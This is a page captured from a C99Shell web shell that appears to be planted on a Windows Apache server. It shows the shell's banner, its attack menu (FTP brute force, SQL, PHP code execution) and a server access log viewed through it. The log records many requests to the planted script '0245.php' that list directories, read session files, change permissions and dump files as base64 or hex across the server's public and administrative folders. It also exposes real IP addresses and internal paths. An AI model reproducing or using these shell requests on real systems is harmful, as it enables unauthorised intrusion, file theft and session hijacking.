!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2024.07.12.log (8.16 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
47.128.126.149 - - [12/Jul/2024:00:00:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDownloads&f=autodeclaracion%2817%29.csv&ft=info HTTP/1.1" 200 3666
47.128.57.239 - - [12/Jul/2024:00:00:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=sess_8b24c6ea92op0fic3iec78n6g6 HTTP/1.1" 200 2758
47.128.18.214 - - [12/Jul/2024:00:00:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Cmediaelement&f=wp-mediaelement.css&ft=info HTTP/1.1" 200 3700
47.128.34.63 - - [12/Jul/2024:00:00:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cnetwork&f=site-settings.php&ft=info HTTP/1.1" 200 3732
47.128.52.37 - - [12/Jul/2024:00:00:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Cmediaelement&f=background.png&ft=info HTTP/1.1" 200 3784
201.245.192.253 - - [12/Jul/2024:00:00:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.16.26 - - [12/Jul/2024:00:00:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4336.pdf&ft=info HTTP/1.1" 200 3845
47.128.60.16 - - [12/Jul/2024:00:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1951-2000&f=00001968.tif&ft=edit HTTP/1.1" 200 3167
47.128.38.74 - - [12/Jul/2024:00:01:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts%5CSpryAssets&f=SpryAccordion.js HTTP/1.1" 200 6984
47.128.27.143 - - [12/Jul/2024:00:01:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5873.pdf&ft=info HTTP/1.1" 200 3844
47.128.19.196 - - [12/Jul/2024:00:01:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000&f=00002999.tif&ft=info HTTP/1.1" 200 3733
216.245.221.92 - - [12/Jul/2024:00:01:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Jul/2024:00:00:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.111.187 - - [12/Jul/2024:00:01:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Ctinymce%5Cskins%5Clightgray&sort=0a HTTP/1.1" 200 3707
201.245.192.253 - - [12/Jul/2024:00:01:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.136 - - [12/Jul/2024:00:01:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=7613.pdf HTTP/1.0" 200 2738
47.128.121.152 - - [12/Jul/2024:00:02:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Ctmp&f=sess_h4kf8409lv45milokr534q9m56 HTTP/1.1" 200 2649
47.128.109.9 - - [12/Jul/2024:00:02:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=jquery-ui-dialog.min.css&white=1 HTTP/1.1" 200 2751
172.22.2.4 - - [12/Jul/2024:00:01:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
47.128.48.161 - - [12/Jul/2024:00:02:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=sess_1gkd143pg2gj8s1q6gfe2iedi1 HTTP/1.1" 200 2713
201.245.192.253 - - [12/Jul/2024:00:02:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.121.102 - - [12/Jul/2024:00:02:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=8490.pdf HTTP/1.1" 200 2738
47.128.38.163 - - [12/Jul/2024:00:03:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5079.pdf HTTP/1.1" 200 2738
47.128.16.153 - - [12/Jul/2024:00:03:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=LA.+HC+29_07_2015.pdf HTTP/1.1" 200 2756
47.128.114.85 - - [12/Jul/2024:00:03:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=DatabaseInterface.class.php HTTP/1.1" 200 2749
47.128.55.73 - - [12/Jul/2024:00:03:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1401-1450&f=00001425.tif HTTP/1.1" 200 17696
66.249.66.21 - - [12/Jul/2024:00:03:40 -0500] "GET /Publicaciones/2024EE96616.pdf HTTP/1.1" 404 227
47.128.20.208 - - [12/Jul/2024:00:03:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00001795.tif&white=1 HTTP/1.1" 200 2740
201.245.192.253 - - [12/Jul/2024:00:03:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.99.191 - - [12/Jul/2024:00:03:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6432.pdf&ft=info HTTP/1.1" 200 3846
201.245.192.253 - - [12/Jul/2024:00:04:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [12/Jul/2024:00:04:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.18.23 - - [12/Jul/2024:00:05:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2023&sort=2a HTTP/1.1" 200 44893
47.128.120.101 - - [12/Jul/2024:00:05:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6569.pdf HTTP/1.1" 200 2738
201.245.192.253 - - [12/Jul/2024:00:05:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.44.101 - - [12/Jul/2024:00:06:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5C&f=mysql_stop.bat&ft=info&fullhexdump=1 HTTP/1.1" 200 3521
47.128.32.105 - - [12/Jul/2024:00:06:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1151-1200&f=00001174.tif HTTP/1.1" 200 2944
47.128.43.51 - - [12/Jul/2024:00:06:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2022&sort=2a HTTP/1.1" 200 138148
47.128.44.102 - - [12/Jul/2024:00:06:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00001610.tif HTTP/1.1" 200 2740
47.128.114.99 - - [12/Jul/2024:00:06:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page20_thumbnail.jpg&ft=info HTTP/1.1" 200 3909
216.245.221.92 - - [12/Jul/2024:00:06:46 -0500] "HEAD / HTTP/1.1" 200 -
47.128.49.199 - - [12/Jul/2024:00:06:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&f=template.txt HTTP/1.1" 200 2740
201.245.192.253 - - [12/Jul/2024:00:06:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.52.132 - - [12/Jul/2024:00:07:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2001-2050&f=00002013.tif HTTP/1.1" 200 17695
47.128.41.159 - - [12/Jul/2024:00:07:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=sess_05vouu7cbuemd9rta6t9duqcm4 HTTP/1.1" 200 2713
47.128.32.59 - - [12/Jul/2024:00:07:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page11.swf&ft=info HTTP/1.1" 200 3875
179.60.147.173 - - [12/Jul/2024:00:07:34 -0500] "POST /xmlrpc.php HTTP/1.1" 404 1018
47.128.32.54 - - [12/Jul/2024:00:07:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1851-1900&f=00001878.tif HTTP/1.1" 200 17694
172.22.2.4 - - [12/Jul/2024:00:06:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.48.91 - - [12/Jul/2024:00:07:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0658.pdf&ft=info HTTP/1.1" 200 3845
66.249.66.19 - - [12/Jul/2024:00:07:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/5120.pdf HTTP/1.1" 304 -
47.128.33.116 - - [12/Jul/2024:00:07:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=wp-backbone.min.js&ft=info HTTP/1.1" 200 5594
201.245.192.253 - - [12/Jul/2024:00:07:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.57.117 - - [12/Jul/2024:00:08:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5Cdmz%5Csendmail&f=sendmail.exe&ft=info HTTP/1.1" 200 3594
47.128.54.32 - - [12/Jul/2024:00:08:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1101-1150%5C&f=00001107.tif HTTP/1.1" 200 17699
66.240.236.109 - - [12/Jul/2024:00:08:25 -0500] "GET / HTTP/1.1" 200 319
47.128.99.62 - - [12/Jul/2024:00:08:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin&f=custom-background.php&ft=info HTTP/1.1" 200 3676
172.22.2.4 - - [12/Jul/2024:00:06:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
47.128.58.38 - - [12/Jul/2024:00:08:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=sess_d4edsfj2v2fmuf8fqkie4ksqb3 HTTP/1.1" 200 2713
47.128.99.80 - - [12/Jul/2024:00:08:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Cautoliquidacion&f=formu1.htm&ft=info HTTP/1.1" 200 3738
201.245.192.253 - - [12/Jul/2024:00:08:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.99.113 - - [12/Jul/2024:00:08:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=sess_483iivs1ej2qa17itrn3ci5lq5 HTTP/1.1" 200 2713
201.245.192.253 - - [12/Jul/2024:00:08:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
47.128.46.164 - - [12/Jul/2024:00:09:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00000555.tif HTTP/1.1" 200 2739
47.128.46.159 - - [12/Jul/2024:00:09:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=conoce-la-exposicion-fotografica-de-areas-protegidas-y-acuerdos-de-conservacion.html HTTP/1.1" 200 2789
216.244.66.195 - - [12/Jul/2024:00:09:26 -0500] "GET /BLA/resoluciones/AUTOS%202022/3269.pdf HTTP/1.1" 200 368475
47.128.22.224 - - [12/Jul/2024:00:09:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=7938.pdf HTTP/1.1" 200 2738
47.128.46.187 - - [12/Jul/2024:00:09:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CSIIPEV%5CDiseno+de+Elementos+de+Mobiliario+Urbano%5CRegistros&f=RegistrosOtorgados.html&ft=info HTTP/1.1" 200 3896
47.128.48.155 - - [12/Jul/2024:00:09:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages&f=page72.swf&ft=info HTTP/1.1" 200 3917
201.245.192.253 - - [12/Jul/2024:00:09:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.59.47 - - [12/Jul/2024:00:09:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins&f=ExportPlugin.class.php&ft=info HTTP/1.1" 200 3787
216.244.66.195 - - [12/Jul/2024:00:10:05 -0500] "GET /BLA/resoluciones/AUTOS%202022/3350.pdf HTTP/1.1" 200 340388
47.128.62.37 - - [12/Jul/2024:00:10:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages&f=page33.swf&ft=info HTTP/1.1" 200 3888
172.22.2.4 - - [12/Jul/2024:00:10:15 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
47.128.49.9 - - [12/Jul/2024:00:10:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Ctinymce%5Cutils&sort=2d HTTP/1.1" 200 3622
47.128.26.35 - - [12/Jul/2024:00:10:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1750.pdf&ft=info HTTP/1.1" 200 3846
66.249.66.21 - - [12/Jul/2024:00:10:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201351-1400/00001361.tif HTTP/1.1" 200 126874
47.128.26.245 - - [12/Jul/2024:00:10:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=7667.pdf HTTP/1.1" 200 2738
216.244.66.195 - - [12/Jul/2024:00:10:43 -0500] "GET /BLA/resoluciones/AUTOS%202022/3819.pdf HTTP/1.1" 200 326304
181.53.14.143 - - [12/Jul/2024:00:10:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5273
181.53.14.143 - - [12/Jul/2024:00:10:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40743
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34153
181.53.14.143 - - [12/Jul/2024:00:10:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34153
47.128.25.171 - - [12/Jul/2024:00:10:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cxampp%5Cxampp%5C&f=xampp_service_mercury.exe HTTP/1.1" 200 2836
181.53.14.143 - - [12/Jul/2024:00:10:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12885
201.245.192.253 - - [12/Jul/2024:00:10:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.0 - - [12/Jul/2024:00:11:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=02090.pdf HTTP/1.1" 200 2739
47.128.25.142 - - [12/Jul/2024:00:11:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&f=00002951.tif HTTP/1.1" 200 2740
216.244.66.195 - - [12/Jul/2024:00:11:19 -0500] "GET /BLA/resoluciones/AUTOS%202022/4208.pdf HTTP/1.1" 200 367676
47.128.25.112 - - [12/Jul/2024:00:11:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1623.pdf&ft=info HTTP/1.1" 200 3843
47.128.25.114 - - [12/Jul/2024:00:11:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages&f=page10.swf&ft=info HTTP/1.1" 200 3902
47.128.20.87 - - [12/Jul/2024:00:11:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=nuevo-proyecto-en-el-parque-nacional-natural-chingaza-promueve-la-seguridad-hidrica-en-bogota.html HTTP/1.1" 200 2797
216.245.221.92 - - [12/Jul/2024:00:11:46 -0500] "HEAD / HTTP/1.1" 200 -
47.128.124.168 - - [12/Jul/2024:00:11:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=RESOLUCION+1873+DE+2007.PDF HTTP/1.1" 200 2764
201.245.192.253 - - [12/Jul/2024:00:11:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.14.143 - - [12/Jul/2024:00:12:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 38083
181.53.14.143 - - [12/Jul/2024:00:12:03 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.244.66.195 - - [12/Jul/2024:00:12:03 -0500] "GET /BLA/resoluciones/AUTOS%202022/4935.pdf HTTP/1.1" 200 381268
181.53.14.143 - - [12/Jul/2024:00:12:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31467
47.128.42.90 - - [12/Jul/2024:00:12:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1001-1050%5C&f=00001048.tif HTTP/1.1" 200 17699
181.53.14.143 - - [12/Jul/2024:00:12:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31467
181.53.14.143 - - [12/Jul/2024:00:12:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31467
181.53.14.143 - - [12/Jul/2024:00:12:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1404
181.53.14.143 - - [12/Jul/2024:00:12:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
181.53.14.143 - - [12/Jul/2024:00:12:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
181.53.14.143 - - [12/Jul/2024:00:12:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
181.53.14.143 - - [12/Jul/2024:00:12:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 13505
181.53.14.143 - - [12/Jul/2024:00:12:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 121075
181.53.14.143 - - [12/Jul/2024:00:12:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.60.18 - - [12/Jul/2024:00:12:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00000192.tif HTTP/1.1" 200 2739
47.128.122.153 - - [12/Jul/2024:00:12:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=6012.pdf HTTP/1.1" 200 2738
181.53.14.143 - - [12/Jul/2024:00:12:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 47204
181.53.14.143 - - [12/Jul/2024:00:12:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.244.66.195 - - [12/Jul/2024:00:12:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2822.pdf HTTP/1.1" 200 281093
40.77.167.241 - - [12/Jul/2024:00:12:46 -0500] "GET /Publicaciones/2024EE112783.pdf HTTP/1.1" 404 228
181.53.14.143 - - [12/Jul/2024:00:12:50 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml HTTP/1.1" 200 36773
181.53.14.143 - - [12/Jul/2024:00:12:50 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:12:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [12/Jul/2024:00:12:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.14.143 - - [12/Jul/2024:00:13:04 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21033
